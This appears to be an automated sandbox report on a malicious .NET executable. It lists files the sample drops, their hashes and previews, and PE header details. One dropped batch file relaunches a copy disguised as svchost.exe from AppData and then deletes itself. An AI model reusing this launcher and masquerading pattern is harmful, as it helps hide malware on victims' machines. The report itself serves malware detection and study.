                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):13340
                                    Entropy (8bit):2.6854333364157186
                                    Encrypted:false
                                    SSDEEP:96:TiZYWJMkS6IY5YDbWvHSUYEZO2taiICuZ8jwqUZBa415UGUkdMRForNIH7k3:2ZDAeUlloUva41ddMRFo+bk3
                                    MD5:87E5170013F1F738F4722A6DEEEE4CD8
                                    SHA1:8248C48B60ED22DAA8C7BB0C7167B8D4C32CD507
                                    SHA-256:3D581AFFDD9A34A3CA4383DA9B1BAC91EC9A127CD041B454F5B2A5543AA68820
                                    SHA-512:C2602A14BBE87077146ED11ED01EC05BADDC22A84B0290D17B1E1D4794D84A67D6B2369068912F4ED75026BDDA9A64244BDFD9A8281E512D070D17E5A54C5C0D
                                    Malicious:false
                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:Mini DuMP crash report, 16 streams, Thu Jul 25 21:55:47 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):551026
                                    Entropy (8bit):3.307429585942483
                                    Encrypted:false
                                    SSDEEP:3072:yNirCHp2sR5f+Q0A4uYv/PgCcSS2b1CCqDFC83+vfcsiGFBRU:ygGJ2m9+Isv/TS6qw83QfcsJF
                                    MD5:F07F3A2E6CF336CFFB0A1EAF74310A8E
                                    SHA1:B0343B37C3D7CFF0C39271AC6F6B5CFD017D70A7
                                    SHA-256:06C20FC4C1C9B5345F1C57A721A5C0FDB6999F9A7D263B03F2A8ACB70016FFE7
                                    SHA-512:FEC6CD27F9F1A2D74B4F346F8570B0DACBCBA43CD39F0518CD7E67BC702BA45D5B45075581B4741ABD3AAA326E33E998CBAA351715F1B050F62A302F614C76C1
                                    Malicious:false
                                    Preview:MDMP..a..... .........f........................d...........$...X(.......'..|(......d]..h...........l.......8...........T............;...,...........O..........xQ..............................................................................eJ.......R......Lw......................T.......0.....f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\LisectAVT_2403002A_136.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):1510
                                    Entropy (8bit):5.380493107040482
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNl+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAA
                                    MD5:3C7E5782E6C100B90932CBDED08ADE42
                                    SHA1:D498EE0833BB8C85592FB3B1E482267362DB3F74
                                    SHA-256:361A6FF160343A2400F7D3FA4A009EA20C994B9788C190EB9D53E544BB376490
                                    SHA-512:3A90D61631F4DC920860AEA31FDB5E56A102206311705D5D084E809D364F680B4E95F19CE9849D3F9CB3C2C273393FD2F2C67720BAAA885125EE358D59462B0A
                                    Malicious:true
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\Desktop\LisectAVT_2403002A_136.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):149
                                    Entropy (8bit):5.004493268216296
                                    Encrypted:false
                                    SSDEEP:3:mKDDCMNqTtvL5oqLTVSREaKC5ZACSmqRDqLTVSRE2J5xAInTRIL3uVL1ZPy:hWKqTtT6qLTwiaZ5Omq1qLTwi23fT3Va
                                    MD5:E6B44FBDE2F93E540128548F9D121BF0
                                    SHA1:ACA25D532A63F9FDCFC687B72ED5C4813C24EAF3
                                    SHA-256:CD6C37C44E5CEFFC2F71A6C42C22EC2394CA861D1CDE43B1EFED822F177DABEA
                                    SHA-512:21660637D978FA8B138081A224916EF1EE7BF69256CB65D7BB3EE402268A1AAE11A21087342ED3CA0A710C042529F23D0B0E99BEC602AF2DAA00493BEF128EEB
                                    Malicious:false
                                    Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpD64D.tmp.bat" /f /q..
                                    Process:C:\Users\user\Desktop\LisectAVT_2403002A_136.exe
                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):864352
                                    Entropy (8bit):7.992970277995418
                                    Encrypted:true
                                    SSDEEP:12288:sp4+EpVjZsEpt4Q8gn/pu6JnTzk9Sv+LWK+WGnsVNvlkYkBCdonHi6NQkt8YfhvN:m4Fpl+yD8c/sXwnmYk4HtSkt8WhMUP
                                    MD5:404E164E7C5F003A1AC5EC58CE77A534
                                    SHA1:93FA2AFCE7EE9C58C046C7307A0C30FFC6CF7834
                                    SHA-256:479578F34C0FA25DE3528E6146737205931D3F4914D2F4F8F3E4DA0BE600162C
                                    SHA-512:49A87B4745E2A981CE5ACE4FDD21B55A9D45232B8F4DD13FB8A77CDB402BD1B41E521C3A6C5336C7AB49B6E91D1ED045C22E3A35A2222E47D551BE33A53A409D
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.... D..........."...0..u............... ....@...... ....................................`.......................................................................................................................................................... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@........................................H.......D6...^......A..................................................H.......F~.....o....o....*F~.....o....o....*Vs.........s.........*6.(.....(....*.r%..pr9..pr[..ps....o>..."....6.ri..p(....*z.,..{....,..{....o......(....*f.,..,...,...,...i..i..*.*..(7...*.(8...*.r...p(....(....r...p(....(.........(9...(:...t........oJ...*.(;...%.o<...%.o=...%.o>...%.o?...o@.......ioA......*..{....-..|....sG....(H...&.{....*......(....**....( ...*>...r...p.(....*..{....*..-.r...psM...z.{....,..{
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                    Process:C:\Windows\System32\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.394070040394859
                                    Encrypted:false
                                    SSDEEP:6144:Kl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNA6OBSqa:64vF0MYQUMM6VFYS6U
                                    MD5:0CBCD1AE247D20B0D1A4EFC30E2E83CB
                                    SHA1:9F0DC92A5426DC1685410902C9DFB007B8955A78
                                    SHA-256:D7C67BC4B416F3BDC8A764FA44FA662CBECF9B4188C4473169C8CFCAF7DBE129
                                    SHA-512:387C58C41DA11872DC1A7F2802D963FAF3E26B34927CB2B71F86804171F750CC462DCA22C05F5F01EAECEB7589ED59357BB31D861C2FAD112BE331DD5792FBB8
                                    Malicious:false
                                    Preview:regfH...H....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmR(.a................................................................................................................................................................................................................................................................................................................................................)..U........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\timeout.exe
                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.41440934524794
                                    Encrypted:false
                                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                    Malicious:false
                                    Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.992970277995418
                                    TrID:
                                    • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                    • Win64 Executable GUI (202006/5) 46.43%
                                    • Win64 Executable (generic) (12005/4) 2.76%
                                    • Generic Win/DOS Executable (2004/3) 0.46%
                                    • DOS Executable Generic (2002/1) 0.46%
                                    File name:LisectAVT_2403002A_136.exe
                                    File size:864'352 bytes
                                    MD5:404e164e7c5f003a1ac5ec58ce77a534
                                    SHA1:93fa2afce7ee9c58c046c7307a0c30ffc6cf7834
                                    SHA256:479578f34c0fa25de3528e6146737205931d3f4914d2f4f8f3e4da0be600162c
                                    SHA512:49a87b4745e2a981ce5ace4fdd21b55a9d45232b8f4dd13fb8a77cdb402bd1b41e521c3a6c5336c7ab49b6e91d1ed045c22e3a35a2222e47d551be33a53a409d
                                    SSDEEP:12288:sp4+EpVjZsEpt4Q8gn/pu6JnTzk9Sv+LWK+WGnsVNvlkYkBCdonHi6NQkt8YfhvN:m4Fpl+yD8c/sXwnmYk4HtSkt8WhMUP
                                    TLSH:6F052345B57C3313EABA9034600326E050BEA3ED6FC6C2034D465A175E167C5DAFAEEB
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.... D..........."...0..u............... ....@...... ....................................`................................
                                    Icon Hash:00928e8e8686b000
                                    Entrypoint:0x400000
                                    Entrypoint Section:
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x844420D2 [Thu Apr 26 12:49:22 2040 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:
                                    Instruction
                                    dec ebp
                                    pop edx
                                    nop
                                    add byte ptr [ebx], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+eax], al
                                    add byte ptr [eax], al
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x586.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
